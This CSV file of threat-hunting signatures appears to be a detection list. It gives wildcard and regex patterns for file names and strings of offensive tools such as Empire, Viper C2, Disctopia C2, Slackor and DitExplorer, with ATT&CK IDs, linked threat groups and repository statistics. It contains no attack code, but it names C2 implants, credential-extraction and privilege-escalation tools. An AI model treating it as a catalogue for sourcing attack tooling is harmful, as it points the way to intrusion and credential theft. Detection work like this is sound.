"*Discover-PSMSSQLServers*",".{0,1000}Discover\-PSMSSQLServers.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41003"
"*Discovery_AccountDiscovery_GetNetDomainUser.py*",".{0,1000}Discovery_AccountDiscovery_GetNetDomainUser\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41004"
"*Discovery_AccountDiscovery_PowerView.py*",".{0,1000}Discovery_AccountDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41005"
"*Discovery_ApplicationWindowDiscovery_EnumApplication.py*",".{0,1000}Discovery_ApplicationWindowDiscovery_EnumApplication\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41006"
"*Discovery_Microphone_CallInfo.py*",".{0,1000}Discovery_Microphone_CallInfo\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41007"
"*Discovery_Microphone_camera.py*",".{0,1000}Discovery_Microphone_camera\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41008"
"*Discovery_Microphone_record_mic.py*",".{0,1000}Discovery_Microphone_record_mic\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41009"
"*Discovery_NetworkServiceScanning_ARPScan.py*",".{0,1000}Discovery_NetworkServiceScanning_ARPScan\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41010"
"*Discovery_NetworkServiceScanning_NbtScanByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_NbtScanByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41011"
"*Discovery_NetworkServiceScanning_NextnetByPE.py*",".{0,1000}Discovery_NetworkServiceScanning_NextnetByPE\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41012"
"*Discovery_NetworkServiceScanning_PingByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_PingByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41013"
"*Discovery_NetworkServiceScanning_PortScanByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_PortScanByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41014"
"*Discovery_NetworkServiceScanning_PortScanWithServiceByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_PortScanWithServiceByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41015"
"*Discovery_NetworkShareDiscovery_PowerView.py*",".{0,1000}Discovery_NetworkShareDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41016"
"*Discovery_PermissionGroupsDiscovery_PowerView.py*",".{0,1000}Discovery_PermissionGroupsDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41017"
"*discovery_port_scan*",".{0,1000}discovery_port_scan.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","41018"
"*Discovery_QueryRegistry_GetDotNetVersions.py*",".{0,1000}Discovery_QueryRegistry_GetDotNetVersions\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41019"
"*Discovery_QueryRegistry_GetRDPPort.py*",".{0,1000}Discovery_QueryRegistry_GetRDPPort\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41020"
"*Discovery_RemoteSystemDiscovery_GetDomainIPAddress.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetDomainIPAddress\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41021"
"*Discovery_RemoteSystemDiscovery_GetNetComputer.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetNetComputer\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41022"
"*Discovery_RemoteSystemDiscovery_GetNetDomain.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetNetDomain\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41023"
"*Discovery_RemoteSystemDiscovery_GetNetDomainController.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetNetDomainController\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41024"
"*Discovery_SecuritySoftwareDiscovery_ListAVByTasklist.py*",".{0,1000}Discovery_SecuritySoftwareDiscovery_ListAVByTasklist\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41025"
"*Discovery_SystemNetworkConnectionsDiscovery_GetPublicIP.py*",".{0,1000}Discovery_SystemNetworkConnectionsDiscovery_GetPublicIP\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41026"
"*Discovery_SystemUserDiscovery_GetLastLoggedOn.py*",".{0,1000}Discovery_SystemUserDiscovery_GetLastLoggedOn\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41027"
"*Discovery_SystemUserDiscovery_GetLoggedOnLocal.py*",".{0,1000}Discovery_SystemUserDiscovery_GetLoggedOnLocal\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41028"
"*Disctopia Backdoor*",".{0,1000}Disctopia\sBackdoor.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105  -  T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","41029"
"*disctopia-c2.git*",".{0,1000}disctopia\-c2\.git.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105  -  T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","41030"
"*disctopia-c2-main.zip*",".{0,1000}disctopia\-c2\-main\.zip.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105  -  T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","41031"
"*DiskCryptor Device Installation Disk*",".{0,1000}DiskCryptor\sDevice\sInstallation\sDisk.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","41035"
"*DiskCryptor driver*",".{0,1000}DiskCryptor\sdriver.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","41036"
"*DISKCRYPTOR_MUTEX*",".{0,1000}DISKCRYPTOR_MUTEX.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","#content","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","41037"
"*diskcryptor2john.py*",".{0,1000}diskcryptor2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","41038"
"*DiskCryptor-master*",".{0,1000}DiskCryptor\-master.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","41039"
"*display_privilege_escalation_options(*",".{0,1000}display_privilege_escalation_options\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","41052"
"*dist*_brc4.x64.o*",".{0,1000}dist.{0,1000}_brc4\.x64\.o.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","41060"
"*dist*_brc4.x86.o*",".{0,1000}dist.{0,1000}_brc4\.x86\.o.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","41061"
"*dist/agent.upx.exe*",".{0,1000}dist\/agent\.upx\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","41062"
"*dist/agent.windows.exe*",".{0,1000}dist\/agent\.windows\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","41063"
"*dist/coercedpotato.cna*",".{0,1000}dist\/coercedpotato\.cna.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","41064"
"*dist/nanorobeus_cs.*",".{0,1000}dist\/nanorobeus_cs\..{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","41065"
"*dist/shadow.exe*",".{0,1000}dist\/shadow\.exe.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","41066"
"*dist\shadow.exe*",".{0,1000}dist\\shadow\.exe.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","41067"
"*dist-packages/tor2web/*",".{0,1000}dist\-packages\/tor2web\/.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","41068"
"*distro.ibiblio.org/blackarch/*/os/*",".{0,1000}distro\.ibiblio\.org\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","41069"
"*DIT Explorer Credential Extractor*",".{0,1000}DIT\sExplorer\sCredential\sExtractor.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#content","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41070"
"*DitExplorer.Core*",".{0,1000}DitExplorer\.Core.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41071"
"*DitExplorer.CredentialExtraction*",".{0,1000}DitExplorer\.CredentialExtraction.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41072"
"*DitExplorer.EseInterop*",".{0,1000}DitExplorer\.EseInterop.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41073"
"*DitExplorer.Ntds*",".{0,1000}DitExplorer\.Ntds.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41074"
"*DitExplorer.UI.*",".{0,1000}DitExplorer\.UI\..{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41075"
"*DitExplorer.UI.WpfApp.dll*",".{0,1000}DitExplorer\.UI\.WpfApp\.dll.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41076"
"*DitExplorer.UI.WpfApp.exe*",".{0,1000}DitExplorer\.UI\.WpfApp\.exe.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41077"
"*DitExplorer-v1.0-win64-release.zip*",".{0,1000}DitExplorer\-v1\.0\-win64\-release\.zip.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41078"
"*DitExplorer-v1.0-win64-release-standalone.zip*",".{0,1000}DitExplorer\-v1\.0\-win64\-release\-standalone\.zip.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41079"
